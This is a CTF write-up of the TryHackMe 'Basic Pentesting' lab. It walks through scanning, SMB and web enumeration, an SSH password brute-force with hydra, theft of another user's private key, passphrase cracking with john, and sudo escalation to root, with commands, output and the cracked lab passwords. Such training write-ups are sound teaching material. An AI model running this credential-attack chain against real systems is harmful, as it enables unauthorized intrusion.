

WRITE-UP

TryHackMe BASIC PENTESTING

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I. [Introduction]

To succeed in CTF challenges, I've set up an attack strategy that defines the different phases of attack. This strategy has 3 phases and is inspired by the <u>Cyber Kill Chain</u>.

Here are the 3 phases of this attack strategy:

- PHASE 1 [**RECONNAISSANCE**] : Gather information about our target, such as which technologies are used ? What ports are open and what services are used ? What vulnerabilities and weaknesses can be exploited ? The greater the amount of information gathered, the more sophisticated the attack and the higher the probability of success.
- PHASE 2 [**EXPLOITATION**] : Exploitation of the vulnerabilities identified in the reconnaissance phase. The aim of this phase is to gain initial access to the target's system.
- PHASE 3 [**TOTAL CONTROL & EVASION**] : At this point we have restricted, unstable access which is likely to be detected. So to avoid losing access, we can open up other paths so that we can easily regain access in the event of problems. To do this, we need to obtain more privileges known as elevation of privileges which means moving from a restricted access level to a higher one. Once our mission is completed, we must erase all traces of our passage and leave the network.



II. [Phase 1 : RECONNAISSANCE]

Target IP address: 10.10.126.86

\$ ping -c3 10.10.126.86

PING 10.10.126.86 (10.10.126.86) 56(84) bytes of data. 64 bytes from 10.10.126.86: icmp_seq=1 ttl=63 time=82.5 ms 64 bytes from 10.10.126.86: icmp_seq=2 ttl=63 time=26.7 ms 64 bytes from 10.10.126.86: icmp_seq=3 ttl=63 time=25.9 ms --- 10.10.99.17 ping statistics ---3 packets transmitted, 3 received, 0% packet loss, time 2004ms rtt min/avg/max/mdev = 25.929/45.047/82.476/26.468 ms

- Command -

The "**ping**" command checks whether the machine connected to the network is accessible. The "-**c**" parameter defines the number of ICMP requests sent, in our case 3 requests.

- Analysis -

3 packets are successfully transmitted. We can see that the TTL value is 63, so it's a LINUX/UNIX machine because the default TTL value for Linux/Unix is 64 and for Windows is 128.

- End of Analysis -

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Nmap scan report for 10.10.126.86 Host is up (0.028s latency).

\$ nmap -sC -sV -p- -T5 10.10.126.86

Starting Nmap 7.94SVN (https://nmap.org) at 2024-01-16 19:18 CET Warning: 10.10.126.86 giving up on port because retransmission cap hit (2).

o-response)	
protocol 2.0)	

Not shown: 65152 closed tcp ports (conn-refused), 377 filtered tcp ports (no PORT STATE SERVICE VERSION 2/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; ssh-hostkey: 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA) 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA) 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) _http-title: Site doesn't have a title (text/html). _http-server-header: Apache/2.4.18 (Ubuntu) 39/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) ajp-methods: _ Supported methods: GET HEAD POST OPTIONS 8080/tcp open http Apache Tomcat 9.0.7 _http-title: Apache Tomcat/9.0.7 _http-favicon: Apache Tomcat Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: _clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s smb-security-mode: account_used: guest authentication_level: user challenge_response: supported _ message_signing: disabled (dangerous, but default) smb-os-discovery: OS: Windows 6.1 (Samba 4.3.11-Ubuntu) Computer name: basic2 NetBIOS computer name: BASIC2\x00 Domain name: x00FODN: basic2 _ System time: 2024-01-16T13:18:33-05:00 smb2-time: date: 2024-01-16T18:18:33 _start_date: N/A smb2-security-mode: 3:1:1: _ Message signing enabled but not required nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

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- Command -

The "**nmap**" command can be used to detect open ports, identify hosted services and obtain information on a remote machine's operating system.

The "-sC" parameter enables the use of default scripts, equivalent to -script=default.

The "-sV" parameter is used to determine service/version informations.

The "-p-" parameter scans all ports (0 - 65535).

The "**-T5**" parameter is used to define the execution speed - the value lies between [0; 5].

- Analysis -

6 TCP ports are open: 22[SSH]; 80-8080[HTTP]; 139-445[SMB]; 8009[AJP13].

For port 22: You can connect via "ssh" if you find usernames you can try to brute force the password with the "**Hydra**" tool.

For port 80: you can use the "**Gobuster**" tool for enumeration.

For port 139-445: you can use the "**enum4linux**" tool for enumeration and to access/list the various SMB shares, you can use "**smbclient**".

- End of Analysis -

\$ gobuster dir -u 10.10.126.86 -w /usr/share/dirbuste medium.txt -x php,html,txt Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)	======
 [+] Url: http://10.10.126.86 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: php,html,txt [+] Timeout: 10s 	
Starting gobuster in directory enumeration mode	
/.html (Status: 403) [Size: 292] /index.html (Status: 200) [Size: 158] <mark>/development (Status: 301) [Size: 318] [> http://10.10.126.86/development/]</mark>	

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- Command -

The "**gobuster**" command is used to enumerate directories/files, subdomains and virtual hosts of a web site.

The "**dir**" mode is used to brute force a website's directories/files. There are several other modes, such as (dns: brute force subdomains) and (vhost: brute force virtual hosts).

The "-u" parameter is used to define the url in our case: http://10.10.126.86/

The "-w" parameter is used to define the wordlist. With other tools, this parameter can be "--wordlist=".

The "**-x**" parameter is used to define file extensions for example : php, txt, html.

- Analysis -

A /development directory in which there are 2 files (txt) dev.txt and j.txt.

Index of /development

Name	Last modified	Size Description
Parent Directo	ry	-
dev.txt	2018-04-23 14:52	483
j.txt	2018-04-23 13:10	235

Apache/2.4.18 (Ubuntu) Server at 10.10.106.45 Port 80

The dev.txt file only gives us information on the services configuration :

http://10.10.126.86/development/dev.txt

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat to host that on this server too. Haven't made any real web apps yet, but I have tried that example you get to show off how it works (and it's the REST version of the example!). Oh, and right now <mark>I'm using version 2.5.12</mark>, because other versions were giving me trouble. -K

2018-04-22: <mark>SMB has been configured. -K</mark>

2018-04-21: I got Apache set up. Will put in our content later. -

In the file j.txt we learn that the password "J" is easy to break :

http://10.10.126.86/development/j.txt

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials, and <mark>I was able to crack your hash really easily.</mark> You know our password policy, so please follow it? Change that password ASAP.

-K

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http://10.10.126.86/

Line 7 : <!-- Check our <mark>dev</mark> note section if you need to know what to work on. -->

- End of Analysis -

\$ smbclient -L \\\\10.10.126.86 Sharename Type Comment ---- Anonymous Disk IPC\$ IPC Service (Samba Server 4.3.11-Ubuntu)

Reconnecting with SMB1 for workgroup listing.

Server	Comment
Workgroup	Master
WORKGROUP	BASIC2

- Command -

The "**smbclient**" command is used to access file shares on an SMB server. The "-L" parameter is used to list shares.

- Analysis -

You can access the "Anonymous" share with a blank password.

\$ smbclient \\\\10.10.126.86\\Anonymous
smb: \> ls
D 0 Thu Apr 19 19:31:20 2018
D 0 Thu Apr 19 19:13:06 2018
staff.txt N 173 Thu Apr 19 19:29:55 2018

There is a file called "staff.txt" which gives us 2 names: "Jan" and "Kay".

\$ smb: \> more staff.txt

Announcement to staff: PLEASE do not upload non-work-related items to this share. I know it's all in fun, but this is how mistakes happen. (This means you too, <mark>Jan</mark>!) -<mark>Kay</mark>

- End of Analysis -

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¢ and the last		
\$ enum4	4linux -a 10.10.126.86	
	======================================	
Snarename	Type Comment	
	Diale	
<mark>Anonymous</mark> IPC\$	IPC IPC Service (Samba Server 4.3.11-Ubuntu)	
1	g with SMB1 for workgroup listing.	
Server Comm		
Workgroup N	Master	
WORKGROUT	IP BASIC2	
	ing to map shares on 10.10.106.45	
	45/Anonymous Mapping: OK Listing: OK Writing: N/A	
	derstand response:	
	_OBJECT_NAME_NOT_FOUND listing *	
	45/IPC\$ Mapping: N/A Listing: N/A Writing: N/A	
	======(Users on 10.10.106.45 via RID cycling (RIDS: 500-550,1000-1050))==================================	
[I] Found nev	w SID:	
S-1-22-1		
[I] Found nev	ww SID:	
S-1-5-32		
[I] Found nev	w SID:	
S-1-5-32		
[I] Found nev	w SID:	
S-1-5-32		
[I] Found nev	w SID:	
S-1-5-32		
	ating users using SID S-1-22-1 and logon username '', password ''	
	0 Unix User\kay (Local User)	
	1 Unix User\jan (Local User)	
	ating users using SID S-1-5-32 and logon username '', password ''	
	BUILTIN\Administrators (Local Group)	
	BUILTIN\Users (Local Group)	
	BUILTIN\Guests (Local Group) BUILTIN\Power Users (Local Group)	
	BUILTIN (Power Users (Local Group) BUILTIN (Account Operators (Local Group)	
	BUILTIN \Account Operators (Local Group)	
	BUILTIN \Server Operators (Local Group)	
0-1-0-02-000	DOTETIN (THIL OPERATORS (LOCALOLOUP)	

- Command -

The "**enum4linux**" command is used to enumerate SMB informations (shares, printers, ...) on Windows and Linux systems.

The "-a" parameter is used to enumerate all information (list of users, list of shares....).

- Analysis -

2 "kay, jan" users are listed.

There's also an "Anonymous" share that we found with "**smbclient**". We know that the password for "jan" is easy to crack, so we can brute force the password with the "**Hydra**" tool.

- End of Analysis -

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III. [Phase 2 : EXPLOITATION]

\$ hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.126.86 ssh -t 4

[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task [DATA] attacking ssh://10.10.126.86:22/ [22][ssh] host: 10.10.126.86 **login: jan password: armando** 1 of 1 target successfully completed, 1 valid password found

- Command -

The "**hydra**" command is used to brute force a password for various services (ssh, ftp, snmp...). our case, the service is SSH.

The "-l" parameter is used to define the login.

The "-P" parameter defines a wordlist of passwords.

The "-t" parameter is used to define the number of parallel connections (attempts) (default: 16).

- Analysis -

Hydra has successfully broken the password for the login **jan**, the password is **armando**. So now we can connect via ssh.

- End of Analysis -

\$ ssh jan@10.10.126.86

Jan@10.10.126.86's password: **armando** Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 0 packages can be updated. 0 updates are security updates. Last login: Mon Apr 23 15:55:45 2018 from 192.168.56.102 jan@basic2:~\$

- Command -

The "ssh" command is used to establish encrypted communication with a remote machine.

- Analysis -

We've successfully connected to the remote machine with the user name jan and the password armando. Now we have to try and obtain as many privileges as possible, which is what we call *elevation of privileges*.

- End of Analysis -

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IV. [Phase 3 : TOTAL CONTROL & EVASION]

jan@basic2:~\$ cd /home/ jan@basic2:/home\$ ls jan kay jan@basic2:/home\$ cd kay/ jan@basic2:/home/kay\$ ls -aril total 48 798922 -rw------ 1 root kay 538 Apr 23 2018 .viminfo 793592 -rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful 798691 drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh 792307 -rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile 798920 -rw----- 1 kay kay 57 Apr 23 2018 pass.bak 798919 drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano 786444 -rw----- 1 root kay 119 Apr 23 2018 .lesshst 793590 drwx----- 2 kay kay 4096 Apr 17 2018 .cache 792902 -rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc 793583 -rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout 793456 -rw------ 1 kay kay 756 Apr 23 2018 .bash_history 655362 drwxr-xr-x 4 root root 4096 Apr 19 2018 .. 786930 drwxr-xr-x 5 kay kay 4096 Apr 23 2018 . jan@basic2:/home/kay\$ cd .ssh/ jan@basic2:/home/kay/.ssh\$ ls -aril total 20 798918 -rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pub 798917 -rw-r--r-- 1 kay kay 3326 Apr 19 2018 id_rsa 798921 -rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys 786930 drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .. 798691 drwxr-xr-x 2 kay kay 4096 Apr 23 2018

- Analysis -

We can see that we have access not only to the ".ssh" folder (read permission), but also to the "id_rsa" file, which is the private key for connecting to the user "kay", we'll get this private key and try to connect with it via ssh.

- End of Analysis -

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\$ chmod 600 id_rsa

-Command -

The "**chmod**" command is used to modify/assign access rights to files/directories. The right "**600**" means that only the owner of the file has full read and write access (rw- --- -), once a file permission is set to 600, no one else can access the file.

- Analysis -

we change the rights of the "id_rsa" file with chmod and we can now try to connect with the private key via ssh.

- End of Analysis -

\$ ssh -i id_rsa kay@10.10.126.86

Enter passphrase for key 'id_rsa':

- Command -

The "**ssh**" command is used to establish encrypted communication with a remote machine. The "-**i**" parameter to define the private key we've retrieved.

- Analysis -

A passphrase is requested, so we'll need to try and find it. To do this, we'll transform our private key "id_rsa" into a hash using the "**ssh2john**" tool and then break this hash using the "**john**" tool. - **End of Analysis** -

\$ ssh2john id_rsa > hash.txt

cat hash.txt

- Command -

The "**ssh2john**" command transforms an RSA key into a HASH format.

- Analysis -

The private key has been successfully transformed into a hash. This hash can now be broken using the "john" tool.

- End of analysis -

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\$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status beeswax (id_rsa)

- Command -

The "**john**" command is used to break a hash using a wordlist. The "--wordlist=" parameter is used to define the wordlist.

- Analysis -

The hash has been successfully broken, and we can now connect to user "kay".

- End of analysis -

\$ ssh -i id_rsa kay@10.10.126.86

Enter passphrase for key 'id_rsa': Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com

* Support: https://ubuntu.com/advantage

0 packages can be updated. 0 updates are security updates. Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102

kay@basic2:~\$

- Analysis -

We successfully connected to the remote machine with the username "kay".

- End of Analysis -

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- Analysis -

We have a ".sudo_as_admin_successful" file, so we can say that this user has sudo rights. We have a file called "pass.bak" in which there's a string of characters, so we can imagine that it's a password.

We can now try to list the user's privileges with the "**sudo -l**" command, and the password is the one we found in the "**pass.bak**" file. We can see that user kay has full rights.

So if we type the command "sudo su" we can see that we are root.

- End of Analysis -

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Congratulations! You've completed this challenge. There are two ways (that I'm aware of) to gain a shell, and two ways to privesc. I encourage you to find them all!

If you're in the target audience (newcomers to pentesting), I hope you learned something. A few takeaways from this challenge should be that every little bit of information you can find can be valuable, but sometimes you'll need to find several different pieces of information and combine them to make them useful. Enumeration is key! Also, sometimes it's not as easy as just finding an obviously outdated, vulnerable service right away with a port scan (unlike the first entry in this series). Usually you'll have to dig deeper to find things that aren't as obvious, and therefore might've been overlooked by administrators.

Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you'll send me a link! I can be reached at josiah@vt.edu. If you've got questions or feedback, please reach out to me.

Happy hacking!

- Analysis -

We can see that in the **/root** folder there's a file called "**flag.txt**" in which it says there's another way to succeed. So the elevation of privileges is successful. Mission accomplished, time to escape, erase all traces and escape.

- End of Analysis -

V. [Thanks]

This write-up is over, I hope I was clear and that this write-up was not difficult to understand. Thank you for reading this write-up and there are many more coming soon.

See you soon.

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